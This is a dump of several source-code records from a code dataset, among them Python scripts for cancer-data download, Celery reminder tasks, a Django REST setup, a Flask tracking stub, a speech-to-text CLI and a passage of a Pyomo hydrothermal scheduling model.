file_data = json.loads(response.content.decode(\"utf-8\"))\n file_id = file_data['data']['hits'][0]['file_id']\n\n data_endpt = \"https://api.gdc.cancer.gov/data/{}\".format(file_id)\n print(\"downloading image {} to path {}\".format(file_name,file_path))\n response = requests.get(data_endpt, headers = {\"Content-Type\": \"application/json\"})\n\n with open(file_path, \"wb\") as output_file:\n output_file.write(response.content)\n else:\n print(\"{} already exists, not downloading anything\".format(file_path))\n\ndef dicts_to_sparse(dicts):\n symbol_to_col = {}\n idx = 0\n #create maping from hugo symbol to col in coo matrix\n for case in dicts:\n for symbol in case:\n if symbol not in symbol_to_col:\n symbol_to_col[symbol]=idx\n idx+=1\n row = []\n col = []\n data = []\n #build arrays\n row_idx=0\n for case in dicts:\n for symbol in case:\n row.append(row_idx)\n col.append(symbol_to_col[symbol])\n data.append(case[symbol])\n row_idx += 1\n #build coo\n coo = sparse.coo_matrix((data,(row,col)))\n #convert coo to df\n df = pd.DataFrame.sparse.from_spmatrix(coo,columns=list(symbol_to_col.keys()))\n return df\n\ndef store_hugo(file,hugo,overwrite=False):\n #store a hugo symbol dataframe in an existing h5 file\n hugo_counts = hugo.drop(\"case_barcode\",axis=1)\n hugo_barcodes = hugo['case_barcode'].to_numpy().astype('S')\n hugo_counts_coo = hugo_counts.sparse.to_coo()\n\n #del existing hugo symbols group if overwrite is true\n if 'hugo_symbols' in file:\n print('hugo symbols already stored in this file') \n if overwrite:\n print('overwriting')\n del file['hugo_symbols']\n else:\n return\n\n #store hugos in h5 file\n file.create_group('hugo_symbols')\n hugo = file['hugo_symbols']\n #store values\n hugo.create_dataset('data', data=hugo_counts_coo.data)\n hugo.create_dataset('col', data=hugo_counts_coo.col)\n hugo.create_dataset('row', data=hugo_counts_coo.row)\n hugo.attrs['shape'] = hugo_counts.shape\n #store barcodes\n hugo.create_dataset('barcodes',data=hugo_barcodes)\n #store names\n hugo.create_dataset('names',data=hugo_counts.columns.to_numpy().astype('S'))\n\ndef load_hugo(file):\n #reconstruct hugo symbol dataframe from opened h5 file\n if not 'hugo_symbols' in file:\n print('hugo symbols data not in file')\n return None\n else:\n hugo = file['hugo_symbols']\n #restore the count values\n matrix = sparse.coo_matrix((hugo['data'],(hugo['row'],hugo['col'])),hugo.attrs['shape'])\n cols = np.array(hugo['names']).astype(str)\n df = pd.DataFrame.sparse.from_spmatrix(matrix,columns=cols)\n #add barcodes\n barcodes = np.array(hugo['barcodes']).astype(str)\n df['case_barcode']=barcodes\n return df ","sub_path":"src/labeling_util.py","file_name":"labeling_util.py","file_ext":"py","file_size_in_byte":15351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"257253261","text":"# -*- coding: utf-8 -*-\nimport json\nfrom celery_app import app\nfrom celery.utils.log import get_task_logger\nfrom celery_tasks import SAK_URL, SAK_VERSION\nimport requests\nfrom flod_common.session.utils import make_superuser_auth_cookie\n\nlogger = get_task_logger(__name__)\n\n\ndef send_reminder(url, minutes=None, reminder_slack=None, min_minutes_since_last_reminder=None):\n if minutes is None or not isinstance(minutes, int):\n logger.error(\"send_soknad_reminder_task - antall minutter ikke satt\")\n return\n\n data = {'minutes': minutes}\n if reminder_slack is not None:\n data.update(reminder_slack=reminder_slack)\n if min_minutes_since_last_reminder is not None:\n data.update(min_minutes_since_last_reminder=min_minutes_since_last_reminder)\n\n auth_token_cookie = make_superuser_auth_cookie()\n headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\n return requests.post(url, data=json.dumps(data), cookies=auth_token_cookie, headers=headers)\n\n\n@app.task\ndef send_soknad_reminder_task(minutes=None, reminder_slack=None, min_minutes_since_last_reminder=None):\n url = '%s/api/%s/purringer/soknader/' % (SAK_URL, SAK_VERSION)\n response = send_reminder(url, minutes, reminder_slack, min_minutes_since_last_reminder)\n\n if response.status_code != 201:\n logger.error(\"Could not trigger the sending of soknad reminders, response has status %s!\\n response=%s\"\n % (response.status_code, response))\n\n\n@app.task\ndef send_rapport_reminder_task(minutes=None, reminder_slack=None, min_minutes_since_last_reminder=None):\n url = '%s/api/%s/purringer/rapporter/' % (SAK_URL, SAK_VERSION)\n response = send_reminder(url, minutes, reminder_slack, min_minutes_since_last_reminder)\n\n if response.status_code != 201:\n logger.error(\"Could not trigger the sending of rapport reminders, response has status %s!\\n response=%s\"\n % (response.status_code, response))\n","sub_path":"flod_tasks/celery_tasks/reminder_tasks.py","file_name":"reminder_tasks.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"122619973","text":"###################################\n#\n# \n#\n###################################\n\nimport requests\n\nHost = 'http://127.0.0.1:8000/'\n\nurls_update = 'api/updates/'\nupdate_date = '2018-08-12'\nupdate_time = '13:00:00'\n#update_hook = update_time + '@' + update_time\npayload_update = {'notes_text': 'rilevazione di prova da client', 'pub_date': update_date, 'pub_hour': update_time}\nr = requests.post(Host + urls_update, data = payload_update)\nprint('URL request' + r.url)\nprint('Request status code: ' + str(r.status_code))\nprint('Request status code: ' + str(r.status_code))\nprint('Response header:' + str(r.headers))\nupdate_content = r.json()\nupdate_pk = update_content['pk']\nprint('Content response:' + str(update_content))\nprint('Content pk value:' + str(update_pk))\n\nurls_category = 'api/categories/'\npayload_category = {'name': 'Titoli gevernativi', 'description': 'Tassi e Spread principali titoli benchmark', 'update': update_pk}\nr = requests.post(Host + urls_category, data = payload_category)\nprint('URL request' + r.url)\nprint('Request status code: ' + str(r.status_code))\n\n#payload_category = {'name': 'Tassi', 'description': 'Principali punti della curva EUR IRS', 'update': update_hook}\n#r = requests.post(Host + urls_category, data = payload_category)\n#print('URL request' + r.url)\n#print('Request status code: ' + str(r.status_code))\n\n\n#urls_symbol = 'api/symbol/'\n#payload_symbol = {'notes_text': 'rilevazione di prova da client', 'pub_date': '2018-08-03', 'pub_hour': '08:00:00'}\n#r = requests.post(Host + urls_symbol, data = payload_symbol)\n#print('URL request' + r.url)\n#print('Request status code: ' + str(r.status_code))\n\n#urls_value = 'api/value/'\n#payload_value = {'notes_text': 'rilevazione di prova da client', 'pub_date': '2018-08-03', 'pub_hour': '08:00:00'}\n#r = requests.post(Host + urls_value, data = payload_value)\n#print('URL request' + r.url)\n#print('Request status code: ' + str(r.status_code))","sub_path":"old/marketupdate_rest_client.py","file_name":"marketupdate_rest_client.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"386048967","text":"\"\"\"lab1_webproject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.generic import TemplateView\nfrom rest_framework import routers\nfrom rest_framework.schemas import get_schema_view\nfrom lab1_app import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'language', views.LanguageViewSet, 'language')\nrouter.register(r'word', views.WordViewSet, 'word')\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('account/register', views.UserCreate.as_view()),\n path('admin/', admin.site.urls),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path('lab/', include('lab1_app.urls')),\n path('openapi',\n get_schema_view(\n title=\"lab1_app\",\n description=\"API for Dictionary, \"\n \"the API can store words and their translation\",\n version=\"1.0.0\"\n ),\n name='openapi-schema'),\n path('redoc/',\n TemplateView.as_view(\n template_name='redoc.html',\n extra_context={'schema_url': 'openapi-schema'}\n ),\n name='redoc'),\n\n path('swagger-ui/',\n TemplateView.as_view(\n template_name='swagger-ui.html',\n extra_context={'schema_url': 'openapi-schema'}\n ),\n name='swagger-ui'),\n]\n","sub_path":"lab1_webproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"152392901","text":"from flask import Flask, request\nimport random\nfrom werkzeug.serving import run_simple\napp = Flask(__name__)\napp.debug = True\n\n#######################################################\n#\n# Ruta: http://localhost:5001/\n# Descripcion:\n# Esta ruta muestra informacion sobre el WebServer Rastreo\n#\n#######################################################\n@app.route('/')\ndef Principal():\n return 'Este es el WebService Rastreo!'\n\n#######################################################\n#\n# Ruta: 'http://localhost:5001/SolicitudRastreoCliente/\n# Descripcion:\n# Esta ruta toma el codigo del cliente del cual se solicita\n# el rastreo, devuelve su longitud y latitud.\n#\n#######################################################\n@app.route('/SolicitudRastreoCliente/')\ndef SolicitudRastreoCliente():\n codigoCliente=request.args['codigoCliente']\n longitud = str(random.randint(1, 50000))\n latitud = str(random.randint(1, 50000))\n return \"El cliente [\"+codigoCliente+\"] esta en la siguiente ubicacion. longitud [\"+longitud+\"] y latitud [\"+latitud+\"] \"\n\n#######################################################\n#\n# Ruta: 'http://localhost:5001/SolicitudRastreoPiloto/\n# Descripcion:\n# Esta ruta toma el codigo del piloto del cual se solicita\n# el rastreo, devuelve su longitud y latitud.\n#\n#######################################################\n@app.route('/SolicitudRastreoPiloto/')\ndef SolicitudRastreoPiloto():\n codigoPiloto=request.args['codigoPiloto']\n longitud = str(random.randint(1, 50000))\n latitud = str(random.randint(1, 50000))\n return \"El piloto [\"+codigoPiloto+\"] esta en la siguiente ubicacion. longitud [\"+longitud+\"] y latitud [\"+latitud+\"] \"\n\nif __name__ == \"__main__\":\n run_simple('localhost', 5001, app,\n use_reloader=True, use_debugger=True, use_evalex=True)","sub_path":"Rastreo/microservicioRastreo.py","file_name":"microservicioRastreo.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"254067077","text":"\"\"\"-------------------------------------------------------------------------------------------------\nScript Name: Speech to Text GCloud\nScript Author: Andoni Sooklaris\nDate: 2019-02-04\nUpdated:\n -2019-09-24\n\nTranscribe an audio file using the Google Cloud Speech engine.\n-------------------------------------------------------------------------------------------------\"\"\"\n\nimport argparse\nfrom os.path import join, expanduser\nfrom pydoni.scripts.audio import SpeechToText\n\ndef initialize_argparser():\n \"\"\"\n Initiate program argument parser.\n\n Returns:\n Namespace\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Program argument parser')\n parser._action_groups.pop()\n\n required = parser.add_argument_group('required arguments')\n required.add_argument('--audiofile',type=str, required=True,\n help='Audio file to transcribe')\n required.add_argument('--outfile',type=str, required=True,\n help='Output textfile')\n required.add_argument('--method',type=str, required=False, default='gcs',\n help=\"Method to use for audiofile transcription, one of ['gcs'] (default: {gcs})\")\n required.add_argument('--gcs_split_threshold',type=str, required=False, default=55,\n help='Maximum audio clip size in seconds, if clip exceeds this length it will be split using class method `split()` (default: {55})')\n required.add_argument('--google_application_credentials_json',type=str, required=False,\n default=join(expanduser('~'), 'google-cloud-sdk', 'doni-speech-to-text-ebfb6aece133.json'),\n help='Path to google application credentials file')\n\n optional = parser.add_argument_group('optional arguments')\n optional.add_argument('--apply_correction', action='store_true', default=True,\n help='Apply smart dictation, smart capitalize, remove excess spaces and any manual corrections to transcript (default: {True})')\n optional.add_argument('--verbose', action='store_true', default=False,\n help='Print messages to STDOUT (default: {False})')\n\n return parser.parse_args()\n\n\nns = initialize_argparser()\nSpeechToText(\n audiofile=ns.audiofile,\n outfile=ns.outfile,\n method=ns.method,\n gcs_split_threshold=ns.gcs_split_threshold,\n google_application_credentials_json=ns.google_application_credentials_json,\n apply_correction=ns.apply_correction,\n verbose=ns.verbose\n).run()\n","sub_path":"audio/SpeechToText.py","file_name":"SpeechToText.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"458087440","text":"# forward stage\nfrom __future__ import division\ndef data(confidence, Param, iteration, fcf_Operator): \n\n #import InputFilesForw\n import pyomo.environ as pyomo\n from pyomo.opt import SolverFactory\n from pyomo.core import Suffix\n from utils.parameters import pyomoset, pyomohydro, pyomogates\n from scripts.pyomo_model import obj_function\n from scripts.pyomo_model import load_balance\n from scripts.pyomo_model import energy_conservationF as energy_conservation\n from scripts.pyomo_model import storage_function, costtogo\n from scripts.pyomo_model import variables\n from utils.saveresults import saveiter\n from utils import solver\n import progressbar\n import pickle\n\n # Cost-to-go function\n if fcf_Operator is True:\n dict_fcf = pickle.load(open(\"savedata/fcfdataIter.p\", \"rb\"))\n else:\n dict_fcf = pickle.load(open(\"savedata/fcfdata.p\", \"rb\"))\n fcf_backward = dict_fcf['fcf_backward']\n \n # progress analysis\n bar = progressbar.ProgressBar(max_value = Param.seriesForw*Param.stages, \\\n widgets=[progressbar.Bar('=', '[', ']'), ' Forward stage - iteration '+str(iteration+1)+' ', \n progressbar.Percentage()])\n bar.start(); count = 0\n \n # import data\n dict_hydro = pickle.load(open(\"savedata/hydro_save.p\", \"rb\"))\n dh_factor = dict_hydro['prodFactor']\n dh_limits = dict_hydro['u_limit']\n dict_batt = pickle.load(open(\"savedata/batt_save.p\", \"rb\"))\n dict_lines = pickle.load(open(\"savedata/lines_save.p\", \"rb\"))\n dict_windenergy = pickle.load(open(\"savedata/windspeed_save.p\", \"rb\"))\n dict_wind = pickle.load(open(\"savedata/wind_hat_0.p\", \"rb\"))\n dict_format = pickle.load(open(\"savedata/format_save.p\", \"rb\"))\n df_demand = dict_format['demand']\n df_thmin = dict_format['thermalMin']\n df_thmax = dict_format['thermalMax']\n df_opcost = dict_format['opCost']\n dict_data = pickle.load(open(\"savedata/data_save_iter.p\", \"rb\"))\n dd_rationing = dict_data['rationingData']\n dd_emissions = dict_data['emissionsData']\n b_storageData = dict_data['b_storageData']\n\n # data from dictionaries\n numAreas = dict_data['numAreas']\n numBlocks = dict_format['numBlocks']\n blocksData = dict_data['blocksData']\n thermalPlants = dict_data['thermalPlants']\n smallData = dict_data['smallData']\n smallPlants = dict_data['smallPlants']\n batteries = dict_data['batteries']\n hydroPlants = dict_data['hydroPlants']\n volData = dict_data['volData']\n thermalData = dict_data['thermalData']\n demandArea = dict_format['demandArea']\n rnwArea = dict_windenergy['RnwArea']\n \n circuits = dict_data['linesData']\n fcircuits = list(range(1, len(circuits)+1))\n\n # print results\n lenblk = range(numBlocks)\n lenstg = range(Param.stages); lensc = range(Param.seriesForw)\n\n genThermal = [[[[[] for bl in lenblk] for z in thermalPlants] for x in lenstg] for y in lensc]\n genSmall = [[[[[] for bl in lenblk] for z in smallPlants] for x in lenstg] for y in lensc]\n genHydro = [[[[[] for bl in lenblk] for z in hydroPlants] for x in lenstg] for y in lensc]\n genwind = [[[[[] for bl in lenblk] for z in range(numAreas)] for x in lenstg] for y in lensc]\n spillwind = [[[[[] for bl in lenblk] for z in range(numAreas)] for x in lenstg] for y in lensc]\n genBatteries = [[[[[] for bl in lenblk] for z in batteries] for x in lenstg] for y in lensc]\n genDeficit = [[[[[] for bl in lenblk] for x in lenstg] for y in lensc] for x in range(numAreas)]\n emissCurve = [[[[] for bl in lenblk] for x in lenstg] for y in lensc]\n loadBatteries = [[[[[] for bl in lenblk] for z in batteries] for x in lenstg] for y in lensc]\n lvlBatteries = [[[[] for z in batteries] for x in lenstg] for y in lensc]\n lvlHydro = [[[[] for z in hydroPlants] for x in lenstg] for y in lensc]\n spillHydro = [[[[[] for bl in lenblk] for z in hydroPlants] for x in lenstg] for y in lensc]\n linTransfer = [[[[[] for a in range(numAreas)] for z in range(numAreas)] for x in lenstg] for y in lensc]\n genRnws = [[[[[] for bl in lenblk] for z in range(numAreas)] for x in lenstg] for y in lensc]\n \n # Define solver\n opt = solver.gurobi_solver(SolverFactory)\n #opt = solver.glpk_solver(SolverFactory)\n #opt = solver.cplex_solver(SolverFactory)\n #opt = solver.ipopt_solver(SolverFactory)\n #opt = solver.cbc_solver(SolverFactory)\n #opt = solver.xpress_solver(SolverFactory)\n \n # Define abstract model\n model = pyomo.ConcreteModel()\n\n # SETS\n # set of demand blocks\n model.Blocks = pyomo.Set(initialize=list(range(1, numBlocks+1)))\n # set of state/cut\n model.Cuts = pyomo.Set(initialize= list(range(1, iteration+2)))\n #model.Cuts = pyomo.Set(initialize=[1])\n # set of hydroelectric plants / reservoirs\n model.Hydro = pyomo.Set(initialize=hydroPlants)\n # set of hydro plants with reservoirs\n setData = pyomohydro(hydroPlants, dict_data['hydroReservoir'])\n model.resHydro = pyomo.Set(initialize=setData)\n # generation chains: set of spill and turbining arcs\n setData = pyomoset(dict_hydro['S-downstream'])\n model.SpillArcs = pyomo.Set(initialize= setData, dimen=2)\n setData = pyomoset(dict_hydro['T-downstream'])\n model.TurbiningArcs = pyomo.Set(initialize= setData, dimen=2)\n # set of thermal plants\n model.Thermal = pyomo.Set(initialize=thermalPlants)\n # set of thermal plants\n model.Small = pyomo.Set(initialize=smallPlants)\n # set of wind farms\n model.Wind = pyomo.Set(initialize=dict_data['windPlants'])\n # set of battery units\n model.Batteries = pyomo.Set(initialize=batteries)\n # set of areas in the system\n model.Areas = pyomo.Set(initialize=list(range(1, numAreas+1)))\n model.AreasDmd = pyomo.Set(initialize= demandArea)\n model.AreasRnw = pyomo.Set(initialize= rnwArea)\n # set of lines in the system\n model.Circuits = pyomo.Set(initialize= fcircuits)\n \n # Plants by areas\n def In_init(model, area):\n retval = [];\n for lines_def in range(len(circuits)):\n lines_area = circuits[lines_def][0]\n if lines_area == area:\n retval.append(lines_def+1)\n return retval\n model.linesAreaIn = pyomo.Set(model.Areas, initialize= In_init)\n def Out_init(model, area):\n retval = [];\n for lines_def in range(len(circuits)):\n lines_area = circuits[lines_def][1]\n if lines_area == area:\n retval.append(lines_def+1)\n return retval\n model.linesAreaOut = pyomo.Set(model.Areas, initialize= Out_init)\n \n def thermalArea_init(model, area):\n retval = []\n for i in model.Thermal:\n th_indx = thermalPlants.index(i)\n are_pl = dict_format['area_thermal'][th_indx]\n if are_pl == area:\n retval.append(i)\n return retval\n model.ThermalArea = pyomo.Set(model.Areas, initialize= thermalArea_init)\n \n def hydroArea_init(model, area):\n retval = []\n for i in model.Hydro:\n hy_indx = hydroPlants.index(i)\n are_pl = dict_format['area_hydro'][hy_indx]\n if are_pl == area:\n retval.append(i)\n return retval\n model.HydroArea = pyomo.Set(model.Areas, initialize= hydroArea_init)\n \n def smallArea_init(model, area):\n retval = []\n for i in model.Small:\n sm_indx = smallPlants.index(i)\n are_pl = dict_format['area_small'][sm_indx]\n if are_pl == area:\n retval.append(i)\n return retval\n model.SmallArea = pyomo.Set(model.Areas, initialize= smallArea_init)\n \n # PARAMETERS\n # cost of thermal production\n model.cost = pyomo.Param(model.Thermal, mutable=True)\n # cost of energy rationing\n model.rationing = pyomo.Param(model.Areas, mutable=True)\n # demand for each stage\n model.demand = pyomo.Param(model.Areas, model.Blocks, mutable=True)\n # inflows for each stage\n model.inflows = pyomo.Param(model.Hydro, mutable=True)\n # wind inflows for each stage\n model.meanWind = pyomo.Param(model.Areas, model.Blocks, mutable=True)\n # production factor for each hydro plant\n model.factorH = pyomo.Param(model.Hydro, mutable=True)\n # Hydro plants by area\n # production cost (CxC) for each hydro plant\n dictplant = {hydroPlants[z]: dict_hydro['oymcost'][z] for z in range(len(hydroPlants))}\n model.hydroCost = pyomo.Param(model.Hydro, initialize=dictplant)\n # production factor for each battery unit\n model.factorB = pyomo.Param(model.Batteries, mutable=True)\n # Batteries by area\n dictplant = {batteries[z]: dict_batt['b_area'][z] for z in range(len(batteries))}\n model.BatteriesArea = pyomo.Param(model.Batteries, initialize=dictplant)\n # coeficcient of lineal segments in the future cost function\n model.coefcTerm = pyomo.Param(model.Hydro, model.Cuts, mutable=True)\n # constant term of lineal segments in the future cost function\n model.constTerm = pyomo.Param(model.Cuts, mutable=True)\n # coeficcient of lineal segments in the future cost function\n model.coefcBatt = pyomo.Param(model.Batteries, model.Cuts, mutable=True)\n # Initial volume in reservoirs\n model.iniVol = pyomo.Param(model.Hydro, mutable=True)\n # Initial storage in batteries\n model.iniLvl = pyomo.Param(model.Batteries, mutable=True)\n model.iniLvlBlk = pyomo.Param(model.Batteries, model.Blocks, mutable=True)\n\n # BOUNDS\n # bounds (min and max) on hydro generation\n #model.minGenH = pyomo.Param(model.Hydro, model.Blocks, mutable=True)\n model.maxGenH = pyomo.Param(model.Hydro, model.Blocks, mutable=True)\n # bounds (min and max) on thermal generation\n model.minGenT = pyomo.Param(model.Thermal, model.Blocks, mutable=True)\n model.maxGenT = pyomo.Param(model.Thermal, model.Blocks, mutable=True)\n # bounds (min and max) on thermal generation\n model.minGenS = pyomo.Param(model.Small, model.Blocks, mutable=True)\n model.maxGenS = pyomo.Param(model.Small, model.Blocks, mutable=True)\n # bounds (min and max) on batteries generation\n #model.minGenB = pyomo.Param(model.Batteries, model.Blocks, mutable=True)\n model.maxGenB = pyomo.Param(model.Batteries, model.Blocks, mutable=True)\n # bounds (min and max) on wind area generation\n model.maxGenW = pyomo.Param(model.Areas, model.Blocks, mutable=True)\n # bounds (min and max) on capacity of reservoirs\n dictplant = {hydroPlants[z]: dict_hydro['volmin'][z] for z in range(len(hydroPlants))}\n model.minVolH = pyomo.Param(model.Hydro, initialize=dictplant)\n dictplant = {hydroPlants[z]: dict_hydro['volmax'][z] for z in range(len(hydroPlants))}\n model.maxVolH = pyomo.Param(model.Hydro, initialize=dictplant)\n # bounds (min and max) on capacity of batteries\n model.maxlvl = pyomo.Param(model.Batteries, mutable=True)\n model.maxlvlB = pyomo.Param(model.Batteries, mutable=True)\n # bounds (max) on capacity of lines\n model.lineLimit = pyomo.Param(model.Circuits, model.Blocks, mutable=True)\n \n ###########################################################################\n \n # Bounds and DECISION VARIABLES\n variables(model, pyomo)\n \n ###########################################################################\n \n # conditional constraints\n \n if Param.dist_free is True:\n \n dict_pleps = pickle.load(open(\"savedata/pleps_save.p\", \"rb\"))\n residual = dict_pleps['p_points']\n \n numPleps = dict_pleps['plepcount']\n model.plepNum = pyomo.Set(initialize= list(range(1, numPleps+1)))\n \n # coeficient pleps variables\n model.factorPlep = pyomo.Var(model.Areas, model.Blocks, model.plepNum, domain=pyomo.NonNegativeReals)\n # aggregated renewables production\n model.RnwLoad = pyomo.Var(model.Areas, model.Blocks)\n \n # p_efficient points\n model.plep = pyomo.Param(model.Areas, model.Blocks, model.plepNum, mutable=True)\n \n if Param.param_opf is True:\n dict_intensity = pickle.load(open(\"savedata/matrixbeta_save.p\", \"rb\"))\n \n # generation chains: set of spill and turbining arcs\n setData = pyomoset(dict_intensity['matrixLineBus'][0])\n model.linebus = pyomo.Set(initialize= setData, dimen=2)\n \n # lines intensities OPF\n model.flines = pyomo.Param(model.Circuits, model.Areas, mutable=True)\n \n # flowgates parameters\n if Param.flow_gates is True:\n \n numGates = dict_format['numGates']\n gatesets = dict_lines['gatesets']\n gateslimit = dict_lines['gateslimit']\n \n # set of gates flow in the system\n model.Gates = pyomo.Set(initialize= list(range(1, numGates+1)))\n \n # flow gates set\n setData = pyomogates(gatesets)\n model.gateLines = pyomo.Set(initialize=setData, dimen=3)\n \n # defining limit of gate flows\n model.gateLimt = pyomo.Param(model.Gates, model.Blocks, mutable=True)\n \n # emissions consideration\n if Param.emissions is True:\n \n # emission factor for each hydro plant\n dictplant = {hydroPlants[z]: volData[15][z] for z in range(len(hydroPlants))}\n model.hydroFE = pyomo.Param(model.Hydro, initialize=dictplant)\n # emission factor for each thermal plant\n dictplant = {thermalPlants[z]: (Param.thermal_co2[0]*thermalData[13][z])+\n (Param.thermal_co2[1]*thermalData[12][z]*thermalData[11][z]) for z in range(len(thermalPlants))}\n model.thermalFE = pyomo.Param(model.Thermal, initialize=dictplant)\n # emission factor for each small plant\n dictplant = {smallPlants[z]: smallData[8][z] for z in range(len(smallPlants))}\n model.smallFE = pyomo.Param(model.Small, initialize=dictplant)\n # cost of CO2 emissions\n model.co2cost = pyomo.Param(mutable=True)\n \n ################### Optimization model ####################################\n \n # OBJ FUNCTION\n obj_function(Param, model, pyomo)\n \n # CONSTRAINTS\n # define constraint: demand must be served in each block and stage\n load_balance(Param, model, pyomo)\n \n # define constraint: energy conservation\n energy_conservation(Param, model, pyomo)\n\n # define constraint: Wind production conservation\n storage_function(Param, model, pyomo)\n\n # define constraint: future cost funtion\n costtogo(Param, model, pyomo)\n\n # Creating instance\n model.dual = Suffix(direction=Suffix.IMPORT)\n\n ################ Forward analysis #############################\n\n sol_cost_scn = [[],[],[]] # Save operation csot and cost-to-go value\n\n # Save results\n sol_vol_iter = [[0 for x in hydroPlants] for x in lenstg] # Hydro iteration\n sol_lvl_batt = [[0 for x in batteries] for x in lenstg] # Batteries iteration\n\n # Save new state for the current iteration\n sol_scn = [[] for x in lensc] # Hydro iteration\n marg_costs = [[[] for x in lenstg] for x in lensc] # Hydro iteration\n\n # Create a model instance and optimize\n for k in lensc: # Iteration by scenarios\n\n # Update the initial volume at each stage\n for i, plant in enumerate(hydroPlants): \n model.iniVol[plant] = dict_data['volData'][0][i]\n for i, plant in enumerate(batteries): \n model.iniLvl[plant] = dict_data['battData'][0][i]*dict_batt[\"b_storage\"][i][0][0]\n for y in lenblk:\n model.iniLvlBlk[plant, y+1] = dict_data['battData'][0][i]*dict_batt[\"b_storage\"][i][0][0]/numBlocks\n\n sol_cost = [[],[],[]] # Save operation cost and cost-to-go value\n\n for s in lenstg: # Iteration by stages\n\n for z in range(len(circuits)):\n for y in lenblk:\n model.lineLimit[z+1, y+1] = dict_lines['l_limits'][s][circuits[z][0]-1][circuits[z][1]-1]*blocksData[0][y]\n \n # opf matriz restrictions\n if Param.param_opf is True:\n for z in range(len(circuits)):\n for area1 in range(numAreas):\n model.flines[z+1,area1+1]= dict_intensity['matrixbeta'][s][z][area1]\n # flowgates constraints\n if Param.flow_gates is True:\n for gate1 in range(numGates):\n for y in lenblk:\n model.gateLimt[gate1+1, y+1] = gateslimit[gate1][s]*blocksData[0][y]\n\n InflowsHydro = []\n InflowsHydro += [dict_format['inflow_hydro'][n][1][s][k] for n in range(len(hydroPlants))]\n\n for z, plant in enumerate(hydroPlants):\n model.factorH[plant] = dh_factor[z][s]\n model.inflows[plant] = InflowsHydro[z]\n for y in lenblk:\n model.maxGenH[plant, y+1] = dh_limits[z][s]*blocksData[0][y]\n \n if Param.emissions is True:\n model.co2cost = dd_emissions[0][s]\n \n for y in range(numAreas):\n model.rationing[y+1] = dd_rationing[y][s]\n \n \n if Param.dist_free is True:\n # update rationing cost and demand values by stage\n for area1 in range(numAreas):\n for y in lenblk:\n for plp in range(numPleps):\n model.plep[area1+1, y+1, plp+1] = residual[s][k][area1][y][plp]\n else:\n # wind energy\n for z in lenblk:\n for y in range(numAreas):\n model.meanWind[y+1,z+1] = dict_windenergy['windenergy_area'][y][s][k][z]\n\n for z in lenblk:\n for y in range(numAreas):\n model.demand[y+1,z+1] = df_demand[y][s][z]\n model.maxGenW[y+1,z+1] = dict_wind['hat_area'][y][s]*blocksData[0][z]\n \n # Update the generation cost\n for i, plant in enumerate(thermalPlants):\n model.cost[plant] = df_opcost[i][s]\n for y in lenblk:\n model.minGenT[plant, y+1] = df_thmin[s][i]*blocksData[0][y]\n model.maxGenT[plant, y+1] = df_thmax[s][i]*blocksData[0][y]\n\n # Update small plants limits\n for i, plant in enumerate(smallPlants):\n for y in lenblk:\n model.minGenS[plant, y+1] = 0\n model.maxGenS[plant, y+1] = dict_format['smallMax'][s][i]*blocksData[0][y]\n\n # Update batteries limits\n for i, plant in enumerate(batteries):\n model.maxlvl[plant] = dict_batt[\"b_storage\"][i][s][1]\n model.maxlvlB[plant] = dict_batt[\"b_storage\"][i][s][0]*blocksData[0][y]*b_storageData[i][y]\n model.factorB[plant] = dict_data['battData'][4][i]\n for y in lenblk:\n model.maxGenB[plant, y+1] = dict_batt['b_limit'][i][s]*blocksData[0][y]*b_storageData[i][y] # restrictions\n\n # Update the cost-to-go function\n #model.Cuts.clear()\n for z in range(iteration+1): # len(fcf_backward[s+1])):\n #model.Cuts.add(z+1)\n if s+1 == Param.stages:\n model.constTerm[z+1] = fcf_backward[s+1][0][2]\n for y, plant in enumerate(batteries):\n model.coefcBatt[plant, z+1] = fcf_backward[s+1][0][1][y]\n for y, plant in enumerate(hydroPlants):\n model.coefcTerm[plant, z+1] = fcf_backward[s+1][0][0][y]\n else:\n model.constTerm[z+1] = fcf_backward[s+1][z][2]\n for y, plant in enumerate(batteries):\n model.coefcBatt[plant, z+1] = fcf_backward[s+1][z][1][y]\n for y, plant in enumerate(hydroPlants):\n model.coefcTerm[plant, z+1] = fcf_backward[s+1][z][0][y]\n #model.ctFcf.reconstruct()\n\n # solver\n opt.solve(model)#, symbolic_solver_labels=False) #, tee=True)\n #with open('pyomo_model.txt', 'w') as f:\n # model.pprint(ostream=f)\n # instance.display()\n\n # objective function value\n sol_objective = model.OBJ(); costtogo = model.futureCost()\n sol_cost[0].append(sol_objective-costtogo); sol_cost[1].append(sol_objective)\n sol_scn[k].append(sol_objective-costtogo)\n #print(sol_objective)\n\n vol_f_stage = [] # Save results of initial volume - v_t+1\n for vol_fin in [model.vol]:\n varobject = getattr(model, str(vol_fin))\n vol_f_stage += [varobject[i].value for i in hydroPlants]\n\n lvl_f_stage = [] # Save results of initial level - l_t+1\n for lvl_fin in [model.lvl]:\n varobject = getattr(model, str(lvl_fin))\n 